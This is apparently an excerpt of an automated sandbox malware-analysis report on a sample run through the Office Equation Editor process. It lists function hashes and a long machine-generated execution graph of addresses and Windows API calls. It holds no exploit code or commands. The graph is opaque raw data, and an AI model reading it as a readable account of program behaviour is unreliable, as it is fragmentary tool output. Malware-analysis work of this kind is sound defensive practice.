                                                                      Function 03520887 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExitProcess.KERNELBASE(00000000,?,0352087B,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050), ref: 0352088C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352088E Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                      • Instruction ID: f39d3d18fed36d29f73ed9753fd82592eeb97725d1444f0c6cfe6e821574194d
                                                                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                      • Instruction Fuzzy Hash: 14D05E31202502CFD304EB04D980E13F37AFFD4210B14C264D5004B7A9C330E892CAD4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                      Signature Coverage:3.3%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:80
                                                                      execution_graph 97902 bd2e7d 97910 bd3162 97902->97910 97906 bd2e99 97907 bd2ea6 97906->97907 97918 bd2ea9 11 API calls 97906->97918 97909 bd2e91 97919 bd2fd7 97910->97919 97913 bd31a1 TlsAlloc 97914 bd3192 97913->97914 97926 bc0a8c 97914->97926 97916 bd2e87 97916->97909 97917 bd2df8 20 API calls 2 library calls 97916->97917 97917->97906 97918->97909 97920 bd3007 97919->97920 97924 bd3003 97919->97924 97920->97913 97920->97914 97921 bd3027 97921->97920 97923 bd3033 GetProcAddress 97921->97923 97925 bd3043 __crt_fast_encode_pointer 97923->97925 97924->97920 97924->97921 97933 bd3073 97924->97933 97925->97920 97927 bc0a95 97926->97927 97928 bc0a97 IsProcessorFeaturePresent 97926->97928 97927->97916 97930 bc0c5d 97928->97930 97940 bc0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97930->97940 97932 bc0d40 97932->97916 97934 bd3089 97933->97934 97935 bd3094 LoadLibraryExW 97933->97935 97934->97924 97936 bd30b1 GetLastError 97935->97936 97939 bd30c9 97935->97939 97937 bd30bc LoadLibraryExW 97936->97937 97936->97939 97937->97939 97938 bd30e0 FreeLibrary 97938->97934 97939->97934 97939->97938 97940->97932 97941 112410 97956 110000 97941->97956 97943 1124d9 97959 112300 97943->97959 97962 113500 GetPEB 97956->97962 97958 11068b 97958->97943 97960 112309 Sleep 97959->97960 97961 112317 97960->97961 97963 11352a 97962->97963 97963->97958 97964 bdcabc 97965 bdcac5 97964->97965 97966 bdcace 97964->97966 97968 bdc9bb 97965->97968 97988 bd2d74 GetLastError 97968->97988 97970 bdc9c8 98008 bdcada 97970->98008 97972 bdc9d0 98017 bdc74f 97972->98017 97975 bdc9e7 97975->97966 97978 bdca2a 98042 bd29c8 97978->98042 97982 bdca25 98041 bcf2d9 20 API calls __dosmaperr 97982->98041 97984 bdca6e 97984->97978 98048 bdc625 26 API calls 97984->98048 97985 bdca42 97985->97984 97986 bd29c8 _free 20 API calls 97985->97986 97986->97984 97989 bd2d8a 97988->97989 97990 bd2d90 97988->97990 98049 bd320e 11 API calls 2 library calls 97989->98049 97994 bd2ddf SetLastError 97990->97994 98050 bd4c7d 97990->98050 97994->97970 97995 bd2daa 97997 bd29c8 _free 20 API calls 97995->97997 97999 bd2db0 97997->97999 97998 bd2dbf 97998->97995 98000 bd2dc6 97998->98000 98001 bd2deb SetLastError 97999->98001 98058 bd2be6 20 API calls pre_c_initialization 98000->98058 98059 bd28a7 38 API calls _abort 98001->98059 98003 bd2dd1 98005 bd29c8 _free 20 API calls 98003->98005 98007 bd2dd8 98005->98007 98007->97994 98007->98001 98009 bdcae6 CallCatchBlock 98008->98009 98010 bd2d74 pre_c_initialization 38 API calls 98009->98010 98015 bdcaf0 98010->98015 98012 bdcb74 __fread_nolock 98012->97972 98015->98012 98016 bd29c8 _free 20 API calls 98015->98016 98062 bd28a7 38 API calls _abort 98015->98062 98063 bd2f5e EnterCriticalSection 98015->98063 98064 bdcb6b LeaveCriticalSection _abort 98015->98064 98016->98015 98065 bc49a5 98017->98065 98020 bdc770 GetOEMCP 98023 bdc799 98020->98023 98021 bdc782 98022 bdc787 GetACP 98021->98022 98021->98023 98022->98023 98023->97975 98024 bd3820 98023->98024 98025 bd385e 98024->98025 98029 bd382e pre_c_initialization 98024->98029 98076 bcf2d9 20 API calls __dosmaperr 98025->98076 98027 bd3849 RtlAllocateHeap 98028 bd385c 98027->98028 98027->98029 98028->97978 98031 bdcb7c 98028->98031 98029->98025 98029->98027 98075 bc4ead 7 API calls 2 library calls 98029->98075 98032 bdc74f 40 API calls 98031->98032 98033 bdcb9b 98032->98033 98036 bdcbec IsValidCodePage 98033->98036 98038 bdcba2 98033->98038 98040 bdcc11 ___scrt_fastfail 98033->98040 98034 bc0a8c CatchGuardHandler 5 API calls 98035 bdca1d 98034->98035 98035->97982 98035->97985 98037 bdcbfe GetCPInfo 98036->98037 98036->98038 98037->98038 98037->98040 98038->98034 98077 bdc827 GetCPInfo 98040->98077 98041->97978 98043 bd29d3 HeapFree 98042->98043 98047 bd29fc _free 98042->98047 98044 bd29e8 98043->98044 98043->98047 98146 bcf2d9 20 API calls __dosmaperr 98044->98146 98046 bd29ee GetLastError 98046->98047 98047->97975 98048->97978 98049->97990 98056 bd4c8a pre_c_initialization 98050->98056 98051 bd4cca 98061 bcf2d9 20 API calls __dosmaperr 98051->98061 98052 bd4cb5 RtlAllocateHeap 98054 bd2da2 98052->98054 98052->98056 98054->97995 98057 bd3264 11 API calls 2 library calls 98054->98057 98056->98051 98056->98052 98060 bc4ead 7 API calls 2 library calls 98056->98060 98057->97998 98058->98003 98060->98056 98061->98054 98063->98015 98064->98015 98066 bc49b8 98065->98066 98067 bc49c2 98065->98067 98066->98020 98066->98021 98067->98066 98068 bd2d74 pre_c_initialization 38 API calls 98067->98068 98069 bc49e3 98068->98069 98073 bd2ec3 38 API calls _strftime 98069->98073 98071 bc49fc 98074 bd2ef0 38 API calls _strftime 98071->98074 98073->98071 98074->98066 98075->98029 98076->98028 98078 bdc90b 98077->98078 98079 bdc861 98077->98079 98082 bc0a8c CatchGuardHandler 5 API calls 98078->98082 98087 bdd8c3 98079->98087 98084 bdc9b7 98082->98084 98084->98038 98086 bd641b 43 API calls 98086->98078 98088 bc49a5 _strftime 38 API calls 98087->98088 98089 bdd8e3 MultiByteToWideChar 98088->98089 98091 bdd921 98089->98091 98099 bdd9b9 98089->98099 98093 bd3820 _strftime 21 API calls 98091->98093 98096 bdd942 _strftime ___scrt_fastfail 98091->98096 98092 bc0a8c CatchGuardHandler 5 API calls 98094 bdc8c2 98092->98094 98093->98096 98101 bd641b 98094->98101 98095 bdd9b3 98106 bd1537 20 API calls _free 98095->98106 98096->98095 98098 bdd987 MultiByteToWideChar 98096->98098 98098->98095 98100 bdd9a3 GetStringTypeW 98098->98100 98099->98092 98100->98095 98102 bc49a5 _strftime 38 API calls 98101->98102 98103 bd642e 98102->98103 98107 bd61fe 98103->98107 98106->98099 98108 bd6219 98107->98108 98109 bd623f MultiByteToWideChar 98108->98109 98110 bd6269 98109->98110 98111 bd63f3 98109->98111 98114 bd3820 _strftime 21 API calls 98110->98114 98117 bd628a _strftime 98110->98117 98112 bc0a8c CatchGuardHandler 5 API calls 98111->98112 98113 bd6406 98112->98113 98113->98086 98114->98117 98115 bd633f 98143 bd1537 20 API calls _free 98115->98143 98116 bd62d3 MultiByteToWideChar 98116->98115 98118 bd62ec 98116->98118 98117->98115 98117->98116 98134 bd3467 98118->98134 98122 bd634e 98126 bd3820 _strftime 21 API calls 98122->98126 98129 bd636f _strftime 98122->98129 98123 bd6316 98123->98115 98125 bd3467 _strftime 11 API calls 98123->98125 98124 bd63e4 98142 bd1537 20 API calls _free 98124->98142 98125->98115 98126->98129 98127 bd3467 _strftime 11 API calls 98130 bd63c3 98127->98130 98129->98124 98129->98127 98130->98124 98131 bd63d2 WideCharToMultiByte 98130->98131 98131->98124 98132 bd6412 98131->98132 98144 bd1537 20 API calls _free 98132->98144 98135 bd2fd7 pre_c_initialization 5 API calls 98134->98135 98136 bd348e 98135->98136 98137 bd3497 98136->98137 98145 bd34ef 10 API calls 3 library calls 98136->98145 98140 bc0a8c CatchGuardHandler 5 API calls 98137->98140 98139 bd34d7 LCMapStringW 98139->98137 98141 bd34e9 98140->98141 98141->98115 98141->98122 98141->98123 98142->98115 98143->98111 98144->98115 98145->98139 98146->98046 98147 ba105b 98152 ba344d 98147->98152 98149 ba106a 98183 bc00a3 29 API calls __onexit 98149->98183 98151 ba1074 98153 ba345d __wsopen_s 98152->98153 98184 baa961 98153->98184 98157 ba351c 98196 ba3357 98157->98196 98164 baa961 22 API calls 98165 ba354d 98164->98165 98217 baa6c3 98165->98217 98168 be3176 RegQueryValueExW 98169 be320c RegCloseKey 98168->98169 98170 be3193 98168->98170 98172 ba3578 98169->98172 98182 be321e _wcslen 98169->98182 98223 bbfe0b 98170->98223 98172->98149 98173 be31ac 98233 ba5722 98173->98233 98174 ba4c6d 22 API calls 98174->98182 98177 be31d4 98236 ba6b57 98177->98236 98179 be31ee ISource 98179->98169 98181 ba515f 22 API calls 98181->98182 98182->98172 98182->98174 98182->98181 98248 ba9cb3 98182->98248 98183->98151 98185 bbfe0b 22 API calls 98184->98185 98186 baa976 98185->98186 98254 bbfddb 98186->98254 98188 ba3513 98189 ba3a5a 98188->98189 98276 be1f50 98189->98276 98192 ba9cb3 22 API calls 98193 ba3a8d 98192->98193 98278 ba3aa2 98193->98278 98195 ba3a97 98195->98157 98197 be1f50 __wsopen_s 98196->98197 98198 ba3364 GetFullPathNameW 98197->98198 98199 ba3386 98198->98199 98200 ba6b57 22 API calls 98199->98200 98201 ba33a4 98200->98201 98202 ba33c6 98201->98202 98203 be30bb 98202->98203 98204 ba33dd 98202->98204 98206 bbfddb 22 API calls 98203->98206 98302 ba33ee 98204->98302 98208 be30c5 _wcslen 98206->98208 98207 ba33e8 98211 ba515f 98207->98211 98209 bbfe0b 22 API calls 98208->98209 98210 be30fe __fread_nolock 98209->98210 98212 ba516e 98211->98212 98216 ba518f __fread_nolock 98211->98216 98215 bbfe0b 22 API calls 98212->98215 98213 bbfddb 22 API calls 98214 ba3544 98213->98214 98214->98164 98215->98216 98216->98213 98218 baa6dd 98217->98218 98219 ba3556 RegOpenKeyExW 98217->98219 98220 bbfddb 22 API calls 98218->98220 98219->98168 98219->98172 98221 baa6e7 98220->98221 98222 bbfe0b 22 API calls 98221->98222 98222->98219 98225 bbfddb 98223->98225 98224 bcea0c ___std_exception_copy 21 API calls 98224->98225 98225->98224 98226 bbfdfa 98225->98226 98229 bbfdfc 98225->98229 98317 bc4ead 7 API calls 2 library calls 98225->98317 98226->98173 98228 bc066d 98319 bc32a4 RaiseException 98228->98319 98229->98228 98318 bc32a4 RaiseException 98229->98318 98232 bc068a 98232->98173 98234 bbfddb 22 API calls 98233->98234 98235 ba5734 RegQueryValueExW 98234->98235 98235->98177 98235->98179 98237 ba6b67 _wcslen 98236->98237 98238 be4ba1 98236->98238 98241 ba6b7d 98237->98241 98242 ba6ba2 98237->98242 98239 ba93b2 22 API calls 98238->98239 98240 be4baa 98239->98240 98240->98240 98320 ba6f34 22 API calls 98241->98320 98244 bbfddb 22 API calls 98242->98244 98245 ba6bae 98244->98245 98247 bbfe0b 22 API calls 98245->98247 98246 ba6b85 __fread_nolock 98246->98179 98247->98246 98249 ba9cc2 _wcslen 98248->98249 98250 bbfe0b 22 API calls 98249->98250 98251 ba9cea __fread_nolock 98250->98251 98252 bbfddb 22 API calls 98251->98252 98253 ba9d00 98252->98253 98253->98182 98257 bbfde0 98254->98257 98256 bbfdfa 98256->98188 98257->98256 98260 bbfdfc 98257->98260 98264 bcea0c 98257->98264 98271 bc4ead 7 API calls 2 library calls 98257->98271 98259 bc066d 98273 bc32a4 RaiseException 98259->98273 98260->98259 98272 bc32a4 RaiseException 98260->98272 98263 bc068a 98263->98188 98269 bd3820 pre_c_initialization 98264->98269 98265 bd385e 98275 bcf2d9 20 API calls __dosmaperr 98265->98275 98267 bd3849 RtlAllocateHeap 98268 bd385c 98267->98268 98267->98269 98268->98257 98269->98265 98269->98267 98274 bc4ead 7 API calls 2 library calls 98269->98274 98271->98257 98272->98259 98273->98263 98274->98269 98275->98268 98277 ba3a67 GetModuleFileNameW 98276->98277 98277->98192 98279 be1f50 __wsopen_s 98278->98279 98280 ba3aaf GetFullPathNameW 98279->98280 98281 ba3ae9 98280->98281 98282 ba3ace 98280->98282 98283 baa6c3 22 API calls 98281->98283 98284 ba6b57 22 API calls 98282->98284 98285 ba3ada 98283->98285 98284->98285 98288 ba37a0 98285->98288 98289 ba37ae 98288->98289 98292 ba93b2 98289->98292 98291 ba37c2 98291->98195 98293 ba93c9 __fread_nolock 98292->98293 98294 ba93c0 98292->98294 98293->98291 98294->98293 98296 baaec9 98294->98296 98297 baaedc 98296->98297 98301 baaed9 __fread_nolock 98296->98301 98298 bbfddb 22 API calls 98297->98298 98299 baaee7 98298->98299 98300 bbfe0b 22 API calls 98299->98300 98300->98301 98301->98293 98303 ba33fe _wcslen 98302->98303 98304 be311d 98303->98304 98305 ba3411 98303->98305 98307 bbfddb 22 API calls 98304->98307 98312 baa587 98305->98312 98308 be3127 98307->98308 98310 bbfe0b 22 API calls 98308->98310 98309 ba341e __fread_nolock 98309->98207 98311 be3157 __fread_nolock 98310->98311 98313 baa59d 98312->98313 98316 baa598 __fread_nolock 98312->98316 98314 bef80f 98313->98314 98315 bbfe0b 22 API calls 98313->98315 98315->98316 98316->98309 98317->98225 98318->98228 98319->98232 98320->98246 98321 ba1098 98326 ba42de 98321->98326 98325 ba10a7 98327 baa961 22 API calls 98326->98327 98328 ba42f5 GetVersionExW 98327->98328 98329 ba6b57 22 API calls 98328->98329 98330 ba4342 98329->98330 98331 ba93b2 22 API calls 98330->98331 98336 ba4378 98330->98336 98332 ba436c 98331->98332 98334 ba37a0 22 API calls 98332->98334 98333 ba441b GetCurrentProcess IsWow64Process 98335 ba4437 98333->98335 98334->98336 98337 ba444f LoadLibraryA 98335->98337 98338 be3824 GetSystemInfo 98335->98338 98336->98333 98341 be37df 98336->98341 98339 ba449c GetSystemInfo 98337->98339 98340 ba4460 GetProcAddress 98337->98340 98343 ba4476 98339->98343 98340->98339 98342 ba4470 GetNativeSystemInfo 98340->98342 98342->98343 98344 ba447a FreeLibrary 98343->98344 98345 ba109d 98343->98345 98344->98345 98346 bc00a3 29 API calls __onexit 98345->98346 98346->98325 98347 baf7bf 98348 baf7d3 98347->98348 98349 bafcb6 98347->98349 98351 bafcc2 98348->98351 98352 bbfddb 22 API calls 98348->98352 98440 baaceb 23 API calls ISource 98349->98440 98441 baaceb 23 API calls ISource 98351->98441 98354 baf7e5 98352->98354 98354->98351 98355 bafd3d 98354->98355 98356 baf83e 98354->98356 98442 c11155 22 API calls 98355->98442 98370 baed9d ISource 98356->98370 98382 bb1310 98356->98382 98359 bf4beb 98450 c1359c 82 API calls __wsopen_s 98359->98450 98361 bbfddb 22 API calls 98380 baec76 ISource 98361->98380 98363 bafef7 98366 baa8c7 22 API calls 98363->98366 98363->98370 98364 bf4600 98364->98370 98443 baa8c7 98364->98443 98365 bf4b0b 98448 c1359c 82 API calls __wsopen_s 98365->98448 98366->98370 98372 baa8c7 22 API calls 98372->98380 98373 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98373->98380 98374 bafbe3 98374->98370 98376 bf4bdc 98374->98376 98381 baf3ae ISource 98374->98381 98375 baa961 22 API calls 98375->98380 98449 c1359c 82 API calls __wsopen_s 98376->98449 98378 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98378->98380 98379 bc00a3 29 API calls pre_c_initialization 98379->98380 98380->98359 98380->98361 98380->98363 98380->98364 98380->98365 98380->98370 98380->98372 98380->98373 98380->98374 98380->98375 98380->98378 98380->98379 98380->98381 98438 bb01e0 256 API calls 2 library calls 98380->98438 98439 bb06a0 41 API calls ISource 98380->98439 98381->98370 98447 c1359c 82 API calls __wsopen_s 98381->98447 98383 bb17b0 98382->98383 98384 bb1376 98382->98384 98698 bc0242 5 API calls __Init_thread_wait 98383->98698 98385 bb1390 98384->98385 98386 bf6331 98384->98386 98451 bb1940 98385->98451 98389 bf633d 98386->98389 98703 c2709c 256 API calls 98386->98703 98389->98380 98391 bb17ba 98393 bb17fb 98391->98393 98395 ba9cb3 22 API calls 98391->98395 98397 bf6346 98393->98397 98399 bb182c 98393->98399 98394 bb1940 9 API calls 98396 bb13b6 98394->98396 98402 bb17d4 98395->98402 98396->98393 98398 bb13ec 98396->98398 98704 c1359c 82 API calls __wsopen_s 98397->98704 98398->98397 98405 bb1408 __fread_nolock 98398->98405 98700 baaceb 23 API calls ISource 98399->98700 98699 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98402->98699 98403 bb1839 98701 bbd217 256 API calls 98403->98701 98405->98403 98407 bf636e 98405->98407 98415 bbfddb 22 API calls 98405->98415 98416 bbfe0b 22 API calls 98405->98416 98422 bb152f 98405->98422 98424 bf63b2 98405->98424 98426 bb15c7 ISource 98405->98426 98461 baec40 98405->98461 98705 c1359c 82 API calls __wsopen_s 98407->98705 98409 bb1872 98702 bbfaeb 23 API calls 98409->98702 98410 bb153c 98413 bb1940 9 API calls 98410->98413 98411 bf63d1 98707 c25745 54 API calls _wcslen 98411->98707 98414 bb1549 98413->98414 98418 bb1940 9 API calls 98414->98418 98414->98426 98415->98405 98416->98405 98429 bb1563 98418->98429 98419 bb171d 98419->98380 98422->98410 98422->98411 98423 bb1940 9 API calls 98423->98426 98706 c1359c 82 API calls __wsopen_s 98424->98706 98426->98409 98426->98423 98428 bb167b ISource 98426->98428 98485 c1744a 98426->98485 98542 bbeffa 98426->98542 98599 c2958b 98426->98599 98602 c0d4ce 98426->98602 98605 c1f0ec 98426->98605 98614 c2959f 98426->98614 98617 c16ef1 98426->98617 98708 c1359c 82 API calls __wsopen_s 98426->98708 98428->98419 98697 bbce17 22 API calls ISource 98428->98697 98429->98426 98430 baa8c7 22 API calls 98429->98430 98430->98426 98438->98380 98439->98380 98440->98351 98441->98355 98442->98370 98444 baa8ea __fread_nolock 98443->98444 98445 baa8db 98443->98445 98444->98370 98445->98444 98446 bbfe0b 22 API calls 98445->98446 98446->98444 98447->98370 98448->98370 98449->98359 98450->98370 98452 bb195d 98451->98452 98453 bb1981 98451->98453 98460 bb13a0 98452->98460 98711 bc0242 5 API calls __Init_thread_wait 98452->98711 98709 bc0242 5 API calls __Init_thread_wait 98453->98709 98456 bb198b 98456->98452 98710 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98456->98710 98457 bb8727 98457->98460 98712 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98457->98712 98460->98394 98479 baec76 ISource 98461->98479 98462 bc00a3 29 API calls pre_c_initialization 98462->98479 98463 bbfddb 22 API calls 98463->98479 98464 bafef7 98470 baa8c7 22 API calls 98464->98470 98478 baed9d ISource 98464->98478 98467 bf4600 98473 baa8c7 22 API calls 98467->98473 98467->98478 98468 bf4b0b 98716 c1359c 82 API calls __wsopen_s 98468->98716 98469 baa8c7 22 API calls 98469->98479 98470->98478 98473->98478 98475 bc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98475->98479 98476 bafbe3 98476->98478 98480 bf4bdc 98476->98480 98484 baf3ae ISource 98476->98484 98477 baa961 22 API calls 98477->98479 98478->98405 98479->98462 98479->98463 98479->98464 98479->98467 98479->98468 98479->98469 98479->98475 98479->98476 98479->98477 98479->98478 98482 bf4beb 98479->98482 98483 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98479->98483 98479->98484 98713 bb01e0 256 API calls 2 library calls 98479->98713 98714 bb06a0 41 API calls ISource 98479->98714 98717 c1359c 82 API calls __wsopen_s 98480->98717 98718 c1359c 82 API calls __wsopen_s 98482->98718 98483->98479 98484->98478 98715 c1359c 82 API calls __wsopen_s 98484->98715 98486 c17469 98485->98486 98487 c17474 98485->98487 98769 bab567 98486->98769 98489 c17554 98487->98489 98491 baa961 22 API calls 98487->98491 98490 bbfddb 22 API calls 98489->98490 98540 c176a4 98489->98540 98492 c17587 98490->98492 98493 c17495 98491->98493 98494 bbfe0b 22 API calls 98492->98494 98495 baa961 22 API calls 98493->98495 98496 c17598 98494->98496 98497 c1749e 98495->98497 98719 ba6246 98496->98719 98499 ba7510 53 API calls 98497->98499 98501 c174aa 98499->98501 98774 ba525f 98501->98774 98502 baa961 22 API calls 98504 c175ab 98502->98504 98506 ba6246 CloseHandle 98504->98506 98505 c174bf 98816 ba6350 98505->98816 98508 c175b2 98506->98508 98723 ba7510 98508->98723 98511 c1754a 98516 bab567 39 API calls 98511->98516 98513 ba6246 CloseHandle 98515 c175c8 98513->98515 98514 c0d4ce 4 API calls 98517 c17502 98514->98517 98746 ba5745 98515->98746 98516->98489 98517->98511 98518 c17506 98517->98518 98520 ba9cb3 22 API calls 98518->98520 98522 c17513 98520->98522 98825 c0d2c1 26 API calls 98522->98825 98524 c175ea 98754 ba53de 98524->98754 98525 c176de GetLastError 98526 c176f7 98525->98526 98829 ba6216 CloseHandle ISource 98526->98829 98529 c1751c 98529->98511 98530 c175f8 98826 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98530->98826 98532 c17645 98535 bbfddb 22 API calls 98532->98535 98533 c175ff 98533->98532 98534 c17619 98533->98534 98827 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98534->98827 98536 c17679 98535->98536 98538 baa961 22 API calls 98536->98538 98539 c17686 98538->98539 98539->98540 98828 c0417d 22 API calls __fread_nolock 98539->98828 98540->98426 98882 ba9c6e 98542->98882 98546 bbfddb 22 API calls 98547 bbf02b 98546->98547 98549 bbfe0b 22 API calls 98547->98549 98548 bff0a8 98589 bbf0a4 98548->98589 98920 c19caa 39 API calls 98548->98920 98550 bbf03c 98549->98550 98551 ba6246 CloseHandle 98550->98551 98552 bbf047 98551->98552 98554 baa961 22 API calls 98552->98554 98553 bab567 39 API calls 98555 bff10a 98553->98555 98556 bbf04f 98554->98556 98557 bbf0b1 98555->98557 98558 bff112 98555->98558 98559 ba6246 CloseHandle 98556->98559 98560 bbfa5b 3 API calls 98557->98560 98561 bab567 39 API calls 98558->98561 98562 bbf056 98559->98562 98566 bbf0b8 98560->98566 98561->98566 98563 ba7510 53 API calls 98562->98563 98564 bbf062 98563->98564 98565 ba6246 CloseHandle 98564->98565 98567 bbf06c 98565->98567 98568 bff127 98566->98568 98569 bbf0d3 98566->98569 98570 ba5745 5 API calls 98567->98570 98572 bbfe0b 22 API calls 98568->98572 98896 ba6270 98569->98896 98573 bbf07d 98570->98573 98575 bff12c 98572->98575 98576 bbf085 98573->98576 98577 bff0a0 98573->98577 98579 bff140 98575->98579 98921 bbf866 ReadFile SetFilePointerEx 98575->98921 98584 ba53de 27 API calls 98576->98584 98919 ba6216 CloseHandle ISource 98577->98919 98588 bff144 __fread_nolock 98579->98588 98922 c10e85 22 API calls ___scrt_fastfail 98579->98922 98583 bbf0ea 98583->98588 98916 ba62b5 22 API calls 98583->98916 98586 bbf093 98584->98586 98915 ba53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98586->98915 98589->98553 98589->98557 98590 bbf0fe 98593 bbf138 98590->98593 98594 ba6246 CloseHandle 98590->98594 98591 bff069 98918 c0ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98591->98918 98592 bbf09a 98592->98589 98592->98591 98593->98426 98596 bbf12c 98594->98596 98596->98593 98917 ba6216 CloseHandle ISource 98596->98917 98597 bff080 98597->98589 98953 c27f59 98599->98953 98601 c2959b 98601->98426 99045 c0dbbe lstrlenW 98602->99045 98606 ba7510 53 API calls 98605->98606 98607 c1f126 98606->98607 99050 ba9e90 98607->99050 98609 c1f136 98610 c1f15b 98609->98610 98611 baec40 256 API calls 98609->98611 98612 ba9c6e 22 API calls 98610->98612 98613 c1f15f 98610->98613 98611->98610 98612->98613 98613->98426 98615 c27f59 120 API calls 98614->98615 98616 c295af 98615->98616 98616->98426 98618 baa961 22 API calls 98617->98618 98619 c16f1d 98618->98619 98620 baa961 22 API calls 98619->98620 98621 c16f26 98620->98621 98622 c16f3a 98621->98622 98623 bab567 39 API calls 98621->98623 98624 ba7510 53 API calls 98622->98624 98623->98622 98630 c16f57 _wcslen 98624->98630 98625 c16fbc 98628 ba7510 53 API calls 98625->98628 98626 c170bf 99087 ba4ecb 98626->99087 98631 c16fc8 98628->98631 98630->98625 98630->98626 98696 c170e9 98630->98696 98635 baa8c7 22 API calls 98631->98635 98638 c16fdb 98631->98638 98632 c170e5 98634 baa961 22 API calls 98632->98634 98632->98696 98633 ba4ecb 94 API calls 98633->98632 98636 c1711a 98634->98636 98635->98638 98639 baa961 22 API calls 98636->98639 98637 c17027 98641 ba7510 53 API calls 98637->98641 98638->98637 98640 c17005 98638->98640 98644 baa8c7 22 API calls 98638->98644 98642 c17126 98639->98642 98645 ba33c6 22 API calls 98640->98645 98646 c17034 98641->98646 98643 baa961 22 API calls 98642->98643 98647 c1712f 98643->98647 98644->98640 98648 c1700f 98645->98648 98649 c17047 98646->98649 98650 c1703d 98646->98650 98652 baa961 22 API calls 98647->98652 98653 ba7510 53 API calls 98648->98653 99218 c0e199 GetFileAttributesW 98649->99218 98654 baa8c7 22 API calls 98650->98654 98656 c17138 98652->98656 98657 c1701b 98653->98657 98654->98649 98655 c17050 98658 c17063 98655->98658 98661 ba4c6d 22 API calls 98655->98661 98659 ba7510 53 API calls 98656->98659 98660 ba6350 22 API calls 98657->98660 98663 ba7510 53 API calls 98658->98663 98669 c17069 98658->98669 98662 c17145 98659->98662 98660->98637 98661->98658 98664 ba525f 22 API calls 98662->98664 98665 c170a0 98663->98665 98666 c17166 98664->98666 99219 c0d076 57 API calls 98665->99219 98668 ba4c6d 22 API calls 98666->98668 98670 c17175 98668->98670 98669->98696 98671 c171a9 98670->98671 98673 ba4c6d 22 API calls 98670->98673 98672 baa8c7 22 API calls 98671->98672 98674 c171ba 98672->98674 98675 c17186 98673->98675 98676 ba6350 22 API calls 98674->98676 98675->98671 98678 ba6b57 22 API calls 98675->98678 98677 c171c8 98676->98677 98679 ba6350 22 API calls 98677->98679 98680 c1719b 98678->98680 98682 c171d6 98679->98682 98681 ba6b57 22 API calls 98680->98681 98681->98671 98683 ba6350 22 API calls 98682->98683 98684 c171e4 98683->98684 98685 ba7510 53 API calls 98684->98685 98686 c171f0 98685->98686 99109 c0d7bc 98686->99109 98688 c17201 98689 c0d4ce 4 API calls 98688->98689 98690 c1720b 98689->98690 98691 ba7510 53 API calls 98690->98691 98695 c17239 98690->98695 98692 c17229 98691->98692 99163 c12947 98692->99163 99220 ba4f39 98695->99220 98696->98426 98697->98428 98698->98391 98699->98393 98700->98403 98701->98409 98702->98409 98703->98389 98704->98426 98705->98426 98706->98426 98707->98429 98708->98426 98709->98456 98710->98452 98711->98457 98712->98460 98713->98479 98714->98479 98715->98478 98716->98478 98717->98482 98718->98478 98720 ba625f 98719->98720 98721 ba6250 98719->98721 98720->98721 98722 ba6264 CloseHandle 98720->98722 98721->98502 98722->98721 98724 ba7522 98723->98724 98725 ba7525 98723->98725 98724->98513 98726 ba755b 98725->98726 98727 ba752d 98725->98727 98728 be50f6 98726->98728 98730 ba756d 98726->98730 98738 be500f 98726->98738 98830 bc51c6 26 API calls 98727->98830 98833 bc5183 26 API calls 98728->98833 98831 bbfb21 51 API calls 98730->98831 98731 ba753d 98736 bbfddb 22 API calls 98731->98736 98734 be510e 98734->98734 98739 ba7547 98736->98739 98737 be5088 98832 bbfb21 51 API calls 98737->98832 98738->98737 98741 bbfe0b 22 API calls 98738->98741 98740 ba9cb3 22 API calls 98739->98740 98740->98724 98742 be5058 98741->98742 98743 bbfddb 22 API calls 98742->98743 98744 be507f 98743->98744 98745 ba9cb3 22 API calls 98744->98745 98745->98737 98747 ba575c CreateFileW 98746->98747 98748 be4035 98746->98748 98749 ba577b 98747->98749 98748->98749 98750 be403b CreateFileW 98748->98750 98749->98524 